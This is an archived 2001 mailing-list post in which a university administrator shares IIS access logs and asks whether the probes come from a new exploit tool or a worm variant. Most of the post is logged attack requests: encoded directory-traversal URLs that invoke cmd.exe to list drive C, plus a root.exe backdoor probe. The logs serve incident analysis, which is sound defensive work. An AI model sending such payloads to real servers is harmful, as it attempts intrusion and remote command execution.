New IIS exploit tool? Has anyone seen this pattern before?

From: Thomas Haeberlen (Haeberlenat_private-Stuttgart.DE)
Date: Tue Oct 30 2001 - 03:47:00 PST

Next message: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"

Previous message: Kester, Kelly: "RE: New Worm Variant?"
Next in thread: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"
Reply: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello everybody,

has anyone seen this pattern of IIS attacks before? Could this be a new
exploit tool or something like "nimda2"? On the other hand it seems that 
it is only trying the long known holes...

------------------------------- snip ----------------------------------

195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 254 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 403 258 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 256 "-" "-"
------------------------------------ snap --------------------------------

Timestamps are GMT+1. Any hints?

egards,

Thomas Haeberlen

-- 
Thomas Haeberlen
Rechenzentrum Universitaet Stuttgart (RUS)              
Abteilung Informationsdienste  
Allmandring 30 , D-70569 Stuttgart
Email: haeberlenat_private-stuttgart.de
Phone: +49 711 685 47 19 Fax: +49 711 678 76 26

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"
Previous message: Kester, Kelly: "RE: New Worm Variant?"
Next in thread: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"
Reply: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 07:23:36 PST